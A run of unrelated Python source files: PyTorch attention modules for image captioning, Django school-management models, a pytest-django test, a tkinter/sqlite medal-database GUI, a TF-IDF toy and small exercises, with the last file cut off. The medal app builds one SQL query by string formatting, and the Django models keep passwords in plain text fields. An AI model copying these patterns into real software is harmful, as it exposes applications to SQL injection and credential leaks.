return h_2, [torch.cat(_, 0) for _ in zip(state_0, state_1, state_2)]
class DenseAttCore(nn.Module):
def __init__(self, opt, use_maxout=False):
super(DenseAttCore, self).__init__()
self.drop_prob_lm = opt.drop_prob_lm
# self.att0 = Attention(opt)
self.att1 = Attention(opt)
self.att2 = Attention(opt)
opt_input_encoding_size = opt.input_encoding_size
opt.input_encoding_size = opt.input_encoding_size + opt.rnn_size
self.lstm0 = LSTMCore(opt) # att_feat + word_embedding
opt.input_encoding_size = opt.rnn_size * 2
self.lstm1 = LSTMCore(opt)
self.lstm2 = LSTMCore(opt)
opt.input_encoding_size = opt_input_encoding_size
# self.emb1 = nn.Linear(opt.rnn_size, opt.rnn_size)
self.emb2 = nn.Linear(opt.rnn_size, opt.rnn_size)
# fuse h_0 and h_1
self.fusion1 = nn.Sequential(nn.Linear(opt.rnn_size*2, opt.rnn_size),
nn.ReLU(),
nn.Dropout(opt.drop_prob_lm))
# fuse h_0, h_1 and h_2
self.fusion2 = nn.Sequential(nn.Linear(opt.rnn_size*3, opt.rnn_size),
nn.ReLU(),
nn.Dropout(opt.drop_prob_lm))
def forward(self, xt, fc_feats, att_feats, p_att_feats, state, att_masks=None):
# att_res_0 = self.att0(state[0][-1], att_feats, p_att_feats, att_masks)
h_0, state_0 = self.lstm0(torch.cat([xt,fc_feats],1), [state[0][0:1], state[1][0:1]])
att_res_1 = self.att1(h_0, att_feats, p_att_feats, att_masks)
h_1, state_1 = self.lstm1(torch.cat([h_0,att_res_1],1), [state[0][1:2], state[1][1:2]])
att_res_2 = self.att2(h_1 + self.emb2(att_res_1), att_feats, p_att_feats, att_masks)
h_2, state_2 = self.lstm2(torch.cat([self.fusion1(torch.cat([h_0, h_1], 1)),att_res_2],1), [state[0][2:3], state[1][2:3]])
return self.fusion2(torch.cat([h_0, h_1, h_2], 1)), [torch.cat(_, 0) for _ in zip(state_0, state_1, state_2)]
class Attention(nn.Module):
def __init__(self, opt):
super(Attention, self).__init__()
self.rnn_size = opt.rnn_size
self.att_hid_size = opt.att_hid_size
self.h2att = nn.Linear(self.rnn_size, self.att_hid_size)
self.alpha_net = nn.Linear(self.att_hid_size, 1)
#att_feats:[batch_size, w*h, rnn_size ]
#p_att_feats:[batch_size, w*h, att_hid_size]
#两者都是[50, 196, 512]
def forward(self, h, att_feats, p_att_feats, att_masks=None):
# The p_att_feats here is already projected
att_size = att_feats.numel() // att_feats.size(0) // att_feats.size(-1)
att = p_att_feats.view(-1, att_size, self.att_hid_size)
att_h = self.h2att(h) # batch * att_hid_size
att_h = att_h.unsqueeze(1).expand_as(att) # batch * att_size * att_hid_size
dot = att + att_h # batch * att_size * att_hid_size
dot = F.tanh(dot) # batch * att_size * att_hid_size
dot = dot.view(-1, self.att_hid_size) # (batch * att_size) * att_hid_size
dot = self.alpha_net(dot) # (batch * att_size) * 1
dot = dot.view(-1, att_size) # batch * att_size
weight = F.softmax(dot, dim=1) # batch * att_size
if att_masks is not None:
weight = weight * att_masks.view(-1, att_size).float()
weight = weight / weight.sum(1, keepdim=True) # normalize to 1
att_feats_ = att_feats.view(-1, att_size, att_feats.size(-1)) # batch * att_size * att_feat_size
att_res = torch.bmm(weight.unsqueeze(1), att_feats_).squeeze(1) # batch * att_feat_size
return att_res
class Att2in2Core(nn.Module):
def __init__(self, opt):
super(Att2in2Core, self).__init__()
self.input_encoding_size = opt.input_encoding_size
#self.rnn_type = opt.rnn_type
self.rnn_size = opt.rnn_size
#self.num_layers = opt.num_layers
self.drop_prob_lm = opt.drop_prob_lm
self.fc_feat_size = opt.fc_feat_size
self.att_feat_size = opt.att_feat_size
self.att_hid_size = opt.att_hid_size
# Build a LSTM
self.a2c = nn.Linear(self.rnn_size, 2 * self.rnn_size)
self.i2h = nn.Linear(self.input_encoding_size, 5 * self.rnn_size)
self.h2h = nn.Linear(self.rnn_size, 5 * self.rnn_size)
self.dropout = nn.Dropout(self.drop_prob_lm)
self.attention = Attention(opt)
def forward(self, xt, fc_feats, att_feats, p_att_feats, state, att_masks=None, *args):
att_res = self.attention(state[0][-1], att_feats, p_att_feats, att_masks)
#state[0][-1] is h and state[1][-1] is c
all_input_sums = self.i2h(xt) + self.h2h(state[0][-1])
#narrow(dim, index, size) 取出tensor中第dim维上索引从index开始到index+size-1的所有元素存放在data中
sigmoid_chunk = all_input_sums.narrow(1, 0, 3 * self.rnn_size)
sigmoid_chunk = F.sigmoid(sigmoid_chunk)
in_gate = sigmoid_chunk.narrow(1, 0, self.rnn_size)
forget_gate = sigmoid_chunk.narrow(1, self.rnn_size, self.rnn_size)
out_gate = sigmoid_chunk.narrow(1, self.rnn_size * 2, self.rnn_size)
in_transform = all_input_sums.narrow(1, 3 * self.rnn_size, 2 * self.rnn_size) + \
self.a2c(att_res)
in_transform = torch.max(\
in_transform.narrow(1, 0, self.rnn_size),
in_transform.narrow(1, self.rnn_size, self.rnn_size))
next_c = forget_gate * state[1][-1] + in_gate * in_transform
next_h = out_gate * F.tanh(next_c)
#next_c: 50*512 next_h:50*512 也就是batch_size*rnn_size
output = self.dropout(next_h)
state = (next_h.unsqueeze(0), next_c.unsqueeze(0))
return output, state
class IntraAttention(nn.Module):
def __init__(self, opt):
super(IntraAttention, self).__init__()
self.rnn_size = opt.rnn_size
self.att_hid_size = opt.att_hid_size
self.h2att = nn.Linear(self.rnn_size, self.att_hid_size)
self.alpha_net = nn.Linear(self.att_hid_size, 1)
self.input_encoding_size = opt.input_encoding_size
# intraAttention
self.W_prevh = nn.Linear(self.rnn_size, self.att_hid_size, bias = False)
self.W_h = nn.Linear(self.rnn_size, self.att_hid_size)
self.v = nn.Linear(self.att_hid_size, 1, bias = False)
self.W_c = nn.Linear(self.input_encoding_size, self.att_hid_size)
'''
self.W_prevc = nn.Linear(self.rnn_size, self.att_hid_size, bias = False)
self.W_c = nn.Linear(self.rnn_size, self.att_hid_size)
self.v_c = nn.Linear(self.att_hid_size, 1, bias = False)
'''
# att_feats:[batch_size, w*h, rnn_size ]
# p_att_feats:[batch_size, w*h, att_hid_size]
# 两者都是[50, 196, 512]
def forward(self, h, c, att_feats, p_att_feats, att_masks=None, *args):
# intra attention,
if args != ():
states = args[0]
all_pre_h = [states[i][0][-1] for i in range(len(states))] # each element is (bs, rnn_size)
all_pre_h = [elem.unsqueeze(1) for elem in all_pre_h] # batch , 1, rnn_size
prev_h = torch.cat(all_pre_h, 1) # bs, t, rnn_size
bs = prev_h.size()[0]
t = prev_h.size()[1]
prev_hh = prev_h.view(-1, prev_h.size()[-1]) # bs*t, rnn_size
et = self.W_prevh(prev_hh) # bs*t, att_hid_size
et = et.view(bs, t, self.att_hid_size) # bs, t, att_hid_size
dec_fea = self.W_h(h).unsqueeze(1).expand_as(et) # bs, 1, att_hid_size -> bs ,t, att_hid_size h size is: bs, rnn_size
dec_xt = self.W_c(c).unsqueeze(1).expand_as(et)
et = et + dec_fea + dec_xt # bs, t, att_hid_size
et = F.tanh(et) # bs, t, att_hid_size
et = et.view(bs*t, -1) # bs*t, att_hid_size
et = self.v(et).squeeze(1).view(bs, t) # bs, t
at = F.softmax(et, dim = 1).unsqueeze(1) #bs, 1, t
ht_d = torch.bmm(at, prev_h).squeeze(1) # bs, rnn_size
print("at",at)
'''
all_pre_c = [states[i][1][-1] for i in range(len(states))]
all_pre_c = [elem.unsqueeze(1) for elem in all_pre_c] # batch , 1, rnn_size
prev_c = torch.cat(all_pre_c, 1) # bs, t, rnn_size
prev_cc = prev_c.view(-1, prev_c.size()[-1]) # bs*t, rnn_size
ct = self.W_prevc(prev_cc) # bs*t, att_hid_size
ct = ct.view(bs, t, self.att_hid_size) # bs, t, att_hid_size
dec_fea_c = self.W_c(c).unsqueeze(1).expand_as(ct) # bs, 1, att_hid_size -> bs ,t, att_hid_size h size is: bs, rnn_size
ct = ct + dec_fea_c # bs, t, att_hid_size
ct = F.tanh(ct) # bs, t, att_hid_size
ct = ct.view(bs * t, -1) # bs*t, att_hid_size
ct = self.v_c(ct).squeeze(1).view(bs, t) # bs, t
at_c = F.softmax(ct, dim=1).unsqueeze(1) # bs, 1, t
ct_d = torch.bmm(at_c, prev_c).squeeze(1) # bs, rnn_size
'''
# global global_index
# global_index += 1
# import numpy as np
# import os
# np.save(os.path.join("tempdata","prevh" + str(global_index)), prev_h.data.cpu().numpy())
# np.save(os.path.join("tempdata", "at" + str(global_index)), at.data.cpu().numpy())
# np.save(os.path.join("tempdata", "ct_d" + str(global_index)), ct_d.data.cpu().numpy())
# print("states", states)
# print("at", at)
# print("ct_d", ct_d)
#image attention, The p_att_feats here is already projected
att_size = att_feats.numel() // att_feats.size(0) // att_feats.size(-1)
att = p_att_feats.view(-1, att_size, self.att_hid_size)
att_h = self.h2att(h) # batch * att_hid_size
att_h = att_h.unsqueeze(1).expand_as(att) # batch * att_size * att_hid_size
dot = att + att_h # batch * att_size * att_hid_size
dot = F.tanh(dot) # batch * att_size * att_hid_size
dot = dot.view(-1, self.att_hid_size) # (batch * att_size) * att_hid_size
dot = self.alpha_net(dot) # (batch * att_size) * 1
dot = dot.view(-1, att_size) # batch * att_size
weight = F.softmax(dot, dim=1) # batch * att_size
if att_masks is not None:
weight = weight * att_masks.view(-1, att_size).float()
weight = weight / weight.sum(1, keepdim=True) # normalize to 1
att_feats_ = att_feats.view(-1, att_size, att_feats.size(-1)) # batch * att_size * att_feat_size
att_res = torch.bmm(weight.unsqueeze(1), att_feats_).squeeze(1) # batch * att_feat_size
# np.save(os.path.join("tempdata","att_feats" + str(global_index)), att_feats.data.cpu().numpy())
# np.save(os.path.join("tempdata", "weight" + str(global_index)), weight.data.cpu().numpy())
# np.save(os.path.join("tempdata", "att_res" + str(global_index)), att_res.data.cpu().numpy())
# print("att_feats", att_feats)
# print("weight", weight)
# print("att_res",att_res)
if args != ():
return att_res, ht_d
else:
return att_res
class IntraAtt2in2Core(nn.Module):
def __init__(self, opt):
super(IntraAtt2in2Core, self).__init__()
self.input_encoding_size = opt.input_encoding_size
#self.rnn_type = opt.rnn_type
self.rnn_size = opt.rnn_size
#self.num_layers = opt.num_layers
self.drop_prob_lm = opt.drop_prob_lm
self.fc_feat_size = opt.fc_feat_size
self.att_feat_size = opt.att_feat_size
self.att_hid_size = opt.att_hid_size
# Build a LSTM
self.a2c = nn.Linear(self.rnn_size, 2 * self.rnn_size)
self.i2h = nn.Linear(self.input_encoding_size, 5 * self.rnn_size)
self.h2h = nn.Linear(self.rnn_size, 5 * self.rnn_size)
self.dropout = nn.Dropout(self.drop_prob_lm)
#intra-attention
self.d2a = nn.Linear(self.rnn_size, 2 * self.rnn_size)
#self.c2a = nn.Linear(self.rnn_size, 2 * self.rnn_size)
self.attention = IntraAttention(opt)
def forward(self, xt, fc_feats, att_feats, p_att_feats, state, att_masks=None, *args):
if args != ():
att_res, ht_d = self.attention(state[0][-1], state[1][-1], att_feats, p_att_feats, att_masks, *args)
all_input_sums = self.i2h(xt) + self.h2h(ht_d)
else:
att_res = self.attention(state[0][-1], state[1][-1], att_feats, p_att_feats, att_masks)
all_input_sums = self.i2h(xt) + self.h2h(state[0][-1])
#print("ct_d", ct_d)
#print("att_res", att_res)
#state[0][-1] is h and state[1][-1] is c
#narrow(dim, index, size) 取出tensor中第dim维上索引从index开始到index+size-1的所有元素存放在data中
sigmoid_chunk = all_input_sums.narrow(1, 0, 3 * self.rnn_size)
sigmoid_chunk = F.sigmoid(sigmoid_chunk)
in_gate = sigmoid_chunk.narrow(1, 0, self.rnn_size)
forget_gate = sigmoid_chunk.narrow(1, self.rnn_size, self.rnn_size)
out_gate = sigmoid_chunk.narrow(1, self.rnn_size * 2, self.rnn_size)
if args != ():
in_transform = all_input_sums.narrow(1, 3 * self.rnn_size, 2 * self.rnn_size) + \
self.a2c(att_res) + self.d2a(ht_d)
else:
in_transform = all_input_sums.narrow(1, 3 * self.rnn_size, 2 * self.rnn_size) + \
self.a2c(att_res)
in_transform = torch.max(\
in_transform.narrow(1, 0, self.rnn_size),
in_transform.narrow(1, self.rnn_size, self.rnn_size))
next_c = forget_gate * state[1][-1] + in_gate * in_transform
next_h = out_gate * F.tanh(next_c)
#next_c: 50*512 next_h:50*512 也就是batch_size*rnn_size
output = self.dropout(next_h)
state = (next_h.unsqueeze(0), next_c.unsqueeze(0))
if args == ():
return output, state, att_res
else:
return output, state, att_res, ht_d
class Att2inCore(Att2in2Core):
def __init__(self, opt):
super(Att2inCore, self).__init__(opt)
del self.a2c
self.a2c = nn.Linear(self.att_feat_size, 2 * self.rnn_size)
"""
Note this is my attempt to replicate att2all model in self-critical paper.
However, this is not a correct replication actually. Will fix it.
"""
class Att2all2Core(nn.Module):
def __init__(self, opt):
super(Att2all2Core, self).__init__()
self.input_encoding_size = opt.input_encoding_size
#self.rnn_type = opt.rnn_type
self.rnn_size = opt.rnn_size
#self.num_layers = opt.num_layers
self.drop_prob_lm = opt.drop_prob_lm
self.fc_feat_size = opt.fc_feat_size
self.att_feat_size = opt.att_feat_size
self.att_hid_size = opt.att_hid_size
# Build a LSTM
self.a2h = nn.Linear(self.rnn_size, 5 * self.rnn_size)
self.i2h = nn.Linear(self.input_encoding_size, 5 * self.rnn_size)
self.h2h = nn.Linear(self.rnn_size, 5 * self.rnn_size)
self.dropout = nn.Dropout(self.drop_prob_lm)
self.attention = Attention(opt)
def forward(self, xt, fc_feats, att_feats, p_att_feats, state, att_masks=None):
att_res = self.attention(state[0][-1], att_feats, p_att_feats, att_masks)
all_input_sums = self.i2h(xt) + self.h2h(state[0][-1]) + self.a2h(att_res)
sigmoid_chunk = all_input_sums.narrow(1, 0, 3 * self.rnn_size)
sigmoid_chunk = F.sigmoid(sigmoid_chunk)
in_gate = sigmoid_chunk.narrow(1, 0, self.rnn_size)
forget_gate = sigmoid_chunk.narrow(1, self.rnn_size, self.rnn_size)
out_gate = sigmoid_chunk.narrow(1, self.rnn_size * 2, self.rnn_size)
in_transform = all_input_sums.narrow(1, 3 * self.rnn_size, 2 * self.rnn_size)
in_transform = torch.max(\
in_transform.narrow(1, 0, self.rnn_size),
in_transform.narrow(1, self.rnn_size, self.rnn_size))
next_c = forget_gate * state[1][-1] + in_gate * in_transform
next_h = out_gate * F.tanh(next_c)
output = self.dropout(next_h)
state = (next_h.unsqueeze(0), next_c.unsqueeze(0))
return output, state
class AdaAttModel(AttModel):
def __init__(self, opt):
super(AdaAttModel, self).__init__(opt)
self.core = AdaAttCore(opt)
# AdaAtt with maxout lstm
class AdaAttMOModel(AttModel):
def __init__(self, opt):
super(AdaAttMOModel, self).__init__(opt)
self.core = AdaAttCore(opt, True)
class Att2in2Model(AttModel):
def __init__(self, opt):
super(Att2in2Model, self).__init__(opt)
self.core = Att2in2Core(opt)
delattr(self, 'fc_embed')
self.fc_embed = lambda x : x
class IntraAtt2in2Model(AttModel):
def __init__(self, opt):
super(IntraAtt2in2Model, self).__init__(opt)
self.core = IntraAtt2in2Core(opt)
delattr(self, 'fc_embed')
self.fc_embed = lambda x : x
class Att2all2Model(AttModel):
def __init__(self, opt):
super(Att2all2Model, self).__init__(opt)
self.core = Att2all2Core(opt)
delattr(self, 'fc_embed')
self.fc_embed = lambda x : x
class TopDownModel(AttModel):
def __init__(self, opt):
super(TopDownModel, self).__init__(opt)
self.num_layers = 2
self.core = TopDownCore(opt)
class StackAttModel(AttModel):
def __init__(self, opt):
super(StackAttModel, self).__init__(opt)
self.num_layers = 3
self.core = StackAttCore(opt)
class DenseAttModel(AttModel):
def __init__(self, opt):
super(DenseAttModel, self).__init__(opt)
self.num_layers = 3
self.core = DenseAttCore(opt)
class Att2inModel(AttModel):
def __init__(self, opt):
super(Att2inModel, self).__init__(opt)
del self.embed, self.fc_embed, self.att_embed
self.embed = nn.Embedding(self.vocab_size + 1, self.input_encoding_size)
self.fc_embed = self.att_embed = lambda x: x
del self.ctx2att
self.ctx2att = nn.Linear(self.att_feat_size, self.att_hid_size)
self.core = Att2inCore(opt)
self.init_weights()
def init_weights(self):
initrange = 0.1
self.embed.weight.data.uniform_(-initrange, initrange)
self.logit.bias.data.fill_(0)
self.logit.weight.data.uniform_(-initrange, initrange)
|
from django.db import models
class Student(models.Model):
id=models.AutoField(primary_key=True)
name=models.CharField(max_length=255)
email=models.CharField(max_length=255)
address=models.TextField()
gender=models.CharField(max_length=255)
password=models.CharField(max_length=255)
objects = models.Manager()
def __str__(self):
return self.name
class Staff(models.Model):
id=models.AutoField(primary_key=True)
name=models.CharField(max_length=255)
email=models.CharField(max_length=255)
password=models.CharField(max_length=255)
address=models.TextField()
objects = models.Manager()
def __str__(self):
return self.name
class Admin(models.Model):
id=models.AutoField(primary_key=True)
name=models.CharField(max_length=255)
email=models.CharField(max_length=255)
password=models.CharField(max_length=255)
objects=models.Manager()
class Subject(models.Model):
id=models.AutoField(primary_key=True)
sub_name=models.CharField(max_length=255)
student_id=models.ForeignKey(Student,on_delete=models.CASCADE)
objects=models.Manager()
class LeaveStudent(models.Model):
id=models.AutoField(primary_key=True)
student_id=models.ForeignKey(Student,on_delete=models.CASCADE)
leave_date=models.CharField(max_length=255)
leave_status=models.BooleanField(default=False)
objects=models.Manager()
class LeaveStaff(models.Model):
id=models.AutoField(primary_key=True)
staff_id=models.ForeignKey(Staff,on_delete=models.CASCADE)
leave_date=models.CharField(max_length=255)
leave_status=models.BooleanField(default=False)
objects=models.Manager()
class FeedBackStudent(models.Model):
id=models.AutoField(primary_key=True)
student_id=models.ForeignKey(Student,on_delete=models.CASCADE)
feedback=models.TextField()
feedback_reply=models.TextField()
objects=models.Manager()
class FeedBackStaff(models.Model):
id=models.AutoField(primary_key=True)
staff_id=models.ForeignKey(Staff,on_delete=models.CASCADE)
feedback=models.TextField()
feedback_reply=models.TextField()
objects=models.Manager()
class NotificationStaff(models.Model):
id = models.AutoField(primary_key=True)
staff_id= models.ForeignKey(Staff, on_delete=models.CASCADE)
message = models.TextField()
objects = models.Manager()
class NotificationStudent(models.Model):
id = models.AutoField(primary_key=True)
student_id= models.ForeignKey(Student, on_delete=models.CASCADE)
message = models.TextField()
objects = models.Manager() |
import py
from django.conf import settings
from .conftest import create_test_module
from .db_helpers import mark_exists, mark_database, drop_database, db_exists
def test_db_reuse(django_testdir):
"""
Test the re-use db functionality. This test requires a PostgreSQL server
to be available and the environment variables PG_HOST, PG_DB, PG_USER to
be defined.
"""
if settings.DATABASES['default']['ENGINE'] == 'django.db.backends.sqlite3':
py.test.skip('Do not test db reuse since database does not support it')
create_test_module(django_testdir, '''
import pytest
from app.models import Item
@pytest.mark.django_db
def test_db_can_be_accessed():
assert Item.objects.count() == 0
''')
# Use --create-db on the first run to make sure we are not just re-using a
# database from another test run
drop_database()
assert not db_exists()
# Do not pass in --create-db to make sure it is created when it
# does not exist
result_first = django_testdir.runpytest('-v', '--reuse-db')
result_first.stdout.fnmatch_lines([
"*test_db_can_be_accessed PASSED*",
])
assert not mark_exists()
mark_database()
assert mark_exists()
result_second = django_testdir.runpytest('-v', '--reuse-db')
result_second.stdout.fnmatch_lines([
"*test_db_can_be_accessed PASSED*",
])
# Make sure the database has not been re-created
assert mark_exists()
result_third = django_testdir.runpytest('-v', '--reuse-db', '--create-db')
result_third.stdout.fnmatch_lines([
"*test_db_can_be_accessed PASSED*",
])
# Make sure the database has been re-created and the mark is gone
assert not mark_exists()
# def test_conftest_connection_caching(django_testdir, monkeypatch):
# """
# Make sure django.db.connections is properly cleared before a @django_db
# test, when a connection to the actual database has been constructed.
# """
# tpkg_path = setup_test_environ(django_testdir, monkeypatch, '''
# import pytest
# from django.test import TestCase
# from django.conf import settings
# from app.models import Item
# def test_a():
# # assert settings.DATABASES['default']['NAME'] == 'test_pytest_django_db_testasdf'
# Item.objects.count()
# @pytest.mark.django_db
# def test_b():
# assert settings.DATABASES['default']['NAME'] == 'test_pytest_django_db_test'
# Item.objects.count()
# ''')
# tpkg_path.join('conftest.py').write('''
# # from app.models import Item
# # Item.objects.count()
# # from django.db import models
# from django.db import connection
# cursor = connection.cursor()
# cursor.execute('SELECT 1')
# ''')
# result = django_testdir.runpytest('-v')
# result.stdout.fnmatch_lines([
# "*test_b PASSED*",
# "*test_a PASSED*",
# ])
|
num_grid = [
[1,2,3,4],
[5,6,7,8],
[22,26,27,28]
]
print(num_grid[2][2])
print(num_grid[0][0])
# nasted loop
for row in num_grid:
for col in row:
print(col)
#print(num_grid) |
from setuptools import setup, find_packages, version
setup(
name = "interact_fit",
version = '0.0.4',
packages = find_packages()
) |
import sqlite3
from tkinter import *
""" Classes """
class MenuBtn:
def __init__(self, parent,text,command,row,col):
self.parent = parent
self.text = text
self.command = command
self.row = row
self.col = col
Button(self.parent, text = self.text, command = self.command).grid(row=self.row, column=self.col, padx=10)
class MainWindow:
def __init__(self, parent):
self.parent = parent
# Set up the main GUI window
self.parent.geometry("450x450")
self.parent.title("Olympic Medalists")
self.parent.columnconfigure(0,weight=1)
self.parent.rowconfigure(1,weight=1)
# Main Menu Bar
toolbar = Frame(self.parent ,bg="#006494", padx=10, pady=5)
toolbar.grid(row=0, column=0, sticky=E+W)
# The menu buttons
btn_all = MenuBtn(toolbar,"All",lambda: self.show_frame(f1),0,0)
btn_medal = MenuBtn(toolbar,"Medal",lambda: self.show_frame(f2),0,1)
btn_medalist = MenuBtn(toolbar,"Medalist",lambda: self.show_frame(f3),0,2)
# Main Content Area
frame_main = Frame(self.parent ,bg="#ffcc00", padx=10, pady=5)
frame_main.grid(row=1, column=0, sticky=N+E+W+S)
# Content Frames
f1 = Frame(frame_main, bg="#ffcc00", padx=0, pady=5)
f2 = Frame(frame_main, bg="#ffcc00", padx=0, pady=5)
f3 = Frame(frame_main, bg="#ffcc00", padx=0, pady=5)
for frame in (f1, f2, f3):
frame.grid(row=1, column=0, sticky=N+E+W+S)
# Frame 1 - Select All
def refreshAll():
medalists = select_all()
for i,row in enumerate(medalists):
rowID = int(i)
Label(f1, text=row[0],bg="#ffcc00", anchor="w").grid(row=rowID, column=0, padx=10, sticky=E+W)
Label(f1, text=row[1],bg="#ffcc00", anchor="w").grid(row=rowID, column=1, padx=10, sticky=E+W)
Label(f1, text=row[2],bg="#ffcc00", anchor="w").grid(row=rowID, column=2, padx=10, sticky=E+W)
Label(f1, text=row[3],bg="#ffcc00", anchor="w").grid(row=rowID, column=3, padx=10, sticky=E+W)
Button(f1, text = "Refresh", command = refreshAll).grid(row=0, column=4)
# Frame 2 - Select Medal
f2_form = Frame(f2, bg="#ffcc00", padx=0, pady=0)
f2_form.grid(row=0, column=0, sticky=W)
f2_results = Frame(f2, bg="#ffcc00", padx=0, pady=0)
f2_results.grid(row=0, column=1, sticky=N+E+W+S)
variable = StringVar(f2_form)
variable.set("Silver") # default value
def medaltype(medal):
select_medal_results = select_medal(variable.get())
print(variable.get())
for i,row in enumerate(select_medal_results):
rowID = int(i)
Label(f2_results, text=row[0],bg="#ffcc00", anchor="w").grid(row=rowID, column=0, padx=10, sticky=E+W)
Label(f2_results, text=row[1],bg="#ffcc00", anchor="w").grid(row=rowID, column=1, padx=10, sticky=E+W)
Label(f2_results, text=row[2],bg="#ffcc00", anchor="w").grid(row=rowID, column=2, padx=10, sticky=E+W)
Label(f2_results, text=row[3],bg="#ffcc00", anchor="w").grid(row=rowID, column=3, padx=10, sticky=E+W)
medaltype(variable) #Initial display of the results
#o = OptionMenu(f2_form, variable, "Gold", "Silver", "Bronze", command=medaltype).pack()
# Radio Buttons
MODES = [
("Gold", "Gold"),
("Silver", "Silver"),
("Bronze", "Bronze"),
]
for text, mode in MODES:
b = Radiobutton(f2_form, text=text, variable=variable, value=mode, command=lambda: medaltype(mode), bg="#ffcc00")
b.pack(anchor="w")
# Frame 3 - Add Medal
Label(f3, text="First Name", bg="#ffcc00", anchor="w").grid(row=0, column=0,sticky=E+W)
Label(f3, text="Last Name", bg="#ffcc00", anchor="w").grid(row=1, column=0,sticky=E+W)
Label(f3, text="Medal", bg="#ffcc00", anchor="w").grid(row=2, column=0,sticky=E+W)
Label(f3, text="Event", bg="#ffcc00", anchor="w").grid(row=3, column=0,sticky=E+W)
NewFirstName = StringVar()
NewLastName = StringVar()
NewMedal = StringVar()
NewEvent = StringVar()
entry_firstname = Entry(f3,textvariable=NewFirstName).grid(row=0,column=1)
entry_lastname = Entry(f3,textvariable=NewLastName).grid(row=1,column=1)
entry_medal = Entry(f3,textvariable=NewMedal).grid(row=2,column=1)
entry_event = Entry(f3,textvariable=NewEvent).grid(row=3,column=1)
def Add_Medal_Var():
firstname = NewFirstName.get()
lastname = NewLastName.get()
event = NewEvent.get()
medal = NewMedal.get()
add_medalist(medal,firstname,lastname,event)
print("You have added: {0}, {1}, {2}, {3}".format(medal,firstname,lastname,event))
Button(f3, text = "Add Medalist", command = Add_Medal_Var).grid(row=4, column=1, padx=10)
self.show_frame(f2)
def show_frame(self, page_name):
'''Show a frame for the given page name'''
frame = page_name
print(page_name)
if page_name == "f1":
frame.tkraise()
app.refreshAll()
else:
frame.tkraise()
""" Functions """
def select_all():
with sqlite3.connect("medals.db") as db:
cursor = db.cursor()
cursor.execute("select Medal,FirstName,LastName,Event from Medalists")
medalists = cursor.fetchall()
print(medalists)
return medalists
def select_medal(medal):
medaltype=medal
with sqlite3.connect("medals.db") as db:
cursor = db.cursor()
cursor.execute("SELECT Medal,FirstName,LastName,Event FROM Medalists WHERE Medal='{0}'".format(medaltype))
medal = cursor.fetchall()
return medal
def add_medalist(medal,firstname,lastname,event):
NewFirstName = firstname
NewLastName = lastname
NewMedal = medal
NewEvent = event
newrecord = (NewMedal, NewFirstName, NewLastName, NewEvent)
with sqlite3.connect("medals.db") as db:
cursor = db.cursor()
cursor.execute("INSERT INTO Medalists(Medal,FirstName,LastName,Event) VALUES (?,?,?,?)",newrecord)
db.commit()
def main():
root = Tk()
app = MainWindow(root)
root.mainloop()
main()
"""
def menu():
print("\nWhat would you like to see? ")
print("1. All medalists")
print("2. Show medalists by medal")
print("3. Add a new medalist")
choice = input("Please enter your choice (1,2 or 3) ")
if choice == "1":
medalists = select_all()
for row in medalists:
print("{0:8} {1:6} {2:10} {3}".format(row[0], row[1], row[2], row[3]))
elif choice == "2":
medaltype = input("Which medal type do you want?")
medalists = select_medal(medaltype)
for row in medalists:
print("{0:8} {1:6} {2:10} {3}".format(row[0], row[1], row[2], row[3]))
elif choice =="3":
add_medalist()
else:
print("Please choose a valid option")
menu()
def main():
root = Tk()
app = MainWindow(root)
f1 = Frame(root, bg="#ffcc00", padx=10, pady=5)
f2 = Frame(root, bg="#ffcc00")
f3 = Frame(root, bg="#ffcc00")
f4 = Frame(root, bg="#ffcc00")
for frame in (f1, f2, f3, f4):
frame.grid(row=1, column=0, sticky=N+E+W+S)
f1.tkraise()
medalists = select_all()
for i,row in enumerate(medalists):
rowID = int(i)
Label(f1, text=row[0],bg="#ffcc00", anchor="w").grid(row=rowID, column=0, padx=10, sticky=E+W)
Label(f1, text=row[1],bg="#ffcc00", anchor="w").grid(row=rowID, column=1, padx=10, sticky=E+W)
Label(f1, text=row[2],bg="#ffcc00", anchor="w").grid(row=rowID, column=2, padx=10, sticky=E+W)
Label(f1, text=row[3],bg="#ffcc00", anchor="w").grid(row=rowID, column=3, padx=10, sticky=E+W)
main()
"""
|
import string
import pandas as pd
import numpy as np
from nltk.corpus import stopwords
from nltk import wordpunct_tokenize
from nltk import WordNetLemmatizer
from nltk import sent_tokenize
from nltk import pos_tag
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.naive_bayes import GaussianNB, MultinomialNB
from sklearn.metrics import accuracy_score
def tokenize(document):
lemmatizer = WordNetLemmatizer()
"Break the document into sentences"
for sent in sent_tokenize(document):
"Break the sentence into part of speech tagged tokens"
for token, tag in pos_tag(wordpunct_tokenize(sent)):
"Apply preprocessing to the token"
token = token.lower() # Convert to lower case
token = token.strip() # Strip whitespace and other punctuations
token = token.strip('_') # remove _ if any
token = token.strip('*') # remove * if any
"If stopword, ignore."
if token in stopwords.words('english'):
continue
"If punctuation, ignore."
if all(char in string.punctuation for char in token):
continue
"If number, ignore."
if token.isdigit():
continue
# Lemmatize the token and yield
# Note: Lemmatization is the process of looking up a single word form
# from the variety of morphologic affixes that can be applied to
# indicate tense, plurality, gender, etc.
lemma = lemmatizer.lemmatize(token)
yield lemma
train_data = pd.DataFrame({'label': ['x', 'x', 'y', 'y'],
'statement': ['This is a dog, damn!, dog',
'This is a cat, damn!, dog',
'This is a truck, wow!, dog, dog',
'This is a car, wow!, dog, dog']})
test_data = pd.DataFrame({'label': ['x', 'y'],
'statement': ['This is a duck, damn!',
'This is a aeroplane, wow!']})
X_train = train_data['statement']
y_train = train_data['label']
X_test = test_data['statement']
y_test = test_data['label']
vectorizer = TfidfVectorizer(tokenizer=tokenize, preprocessor=None, lowercase=False)
vectorizer.fit(X_train)
print(vectorizer.vocabulary_)
X_train_tfidf = vectorizer.transform(X_train)
X_test_tfidf = vectorizer.transform(X_test)
print(X_train_tfidf.shape)
print(X_test_tfidf.shape)
print(X_train_tfidf.toarray())
print(X_test_tfidf.toarray())
# gnb = GaussianNB()
# gnb.fit(X_train_tfidf.toarray(), y_train)
# Y_pred = gnb.predict(X_test_tfidf.toarray())
# print(str(round(accuracy_score(y_test, Y_pred), 2) * 100) + '%')
# labels = {'barely-true': 0, 'FALSE': 1, 'half-true': 2, 'mostly-true': 3, 'TRUE': 4, 'pants-fire': 5}
#
# YTR = []
# YTS = []
#
# for rec in Y_train.values:
# YTR.append(labels[rec])
#
# for rec in Y_test.values:
# YTS.append(labels[rec])
#
# print(YTR)
|
def generate_fibonacci():
indx = 1
n_prev = 0
n = 1
yield (indx, n)
while True:
sum = n + n_prev
n_prev = n
n = sum
indx+=1
yield (indx, sum)
def main():
